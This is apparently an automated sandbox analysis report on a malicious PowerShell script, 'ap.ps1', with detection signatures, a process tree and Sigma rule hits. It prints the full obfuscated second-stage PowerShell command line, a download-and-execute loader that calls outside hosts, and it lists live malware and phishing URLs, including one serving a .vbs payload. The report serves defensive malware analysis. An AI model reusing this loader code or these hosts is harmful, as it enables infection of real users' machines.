Windows Analysis Report
ap.ps1

Overview

General Information

Sample name: ap.ps1
Analysis ID: 1568999
MD5: fd4a7beeefde4074f9d7c04832560ccc
SHA1: 2750778b94a0797a87f488673043db54691043b2
SHA256: 585a089fb20209a3de1a3e87799320174f90336e92c256eb4e789428f306ceee
Tags: Listofrequireditemsps1user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Obfuscated command line found
Powershell creates an autostart link
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • powershell.exe (PID: 8104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • wscript.exe (PID: 7448 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 8156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. 
SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. 
CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. 
') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. 
');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 1272 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 8104 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 8156 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_8104.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_8156.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

          System Summary

          Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , ProcessId: 7448, ProcessName: wscript.exe
          Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , ProcessId: 7448, ProcessName: wscript.exe
          Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'", ProcessId: 7544, ProcessName: powershell.exe
          Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , ProcessId: 7448, ProcessName: wscript.exe
          Source: File created; Author: Florian Roth (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8104, TargetFilename: C:\Users\Public\sz3.vbs
          Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", ProcessId: 8104, ProcessName: powershell.exe
          Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8104, TargetFilename: C:\Users\Public\sz3.vbs
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$Fra
          Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , ProcessId: 7448, ProcessName: wscript.exe
          Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", ProcessId: 8104, ProcessName: powershell.exe
          No Suricata rule has matched

          AV Detection

          Source: ap.ps1; Avira: detected
          Source: https://www.erp-royal-crown.info/wh/Subordinerende; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerend; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordineren; Avira URL Cloud: Label: phishing
          Source: http://www.erp-royal-crown.info; Avira URL Cloud: Label: phishing
          Source: https://www.pineappletech.ae/na/mg.vbs; Avira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/Subordine; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/; Avira URL Cloud: Label: phishing
          Source: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf; Avira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/Subord; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/w; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smi; Avira URL Cloud: Label: phishing
          Source: https://www.almrwad.com/wh/Subordinerendes78.smi; Avira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinere; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subor; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordi; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subo; Avira URL Cloud: Label: phishing
          Source: http://erp-royal-crown.info; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.s; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordin; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes7; Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/; Avira URL Cloud: Label: phishing
          Source: ap.ps1; ReversingLabs: Detection: 28%
          Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.6% probability
          Source: unknown; HTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.10:49728 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.10:49741 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.10:49754 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.10:49784 version: TLS 1.2
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1543104740.000002CD47A21000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1543104740.000002CD47990000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: n.pdb source: powershell.exe, 00000005.00000002.1432126948.000001B65C8BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1432612236.000001B65C95A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2658934966.0000022F3971F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbpdbtem.pdb source: powershell.exe, 00000009.00000002.2658538272.0000022F395CF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.2658934966.0000022F39763000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *.pdb source: powershell.exe, 00000002.00000002.1606506810.000002CD5FD1C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdbE source: powershell.exe, 00000005.00000002.1434410083.000001B65CC9A000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /na/mg.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive
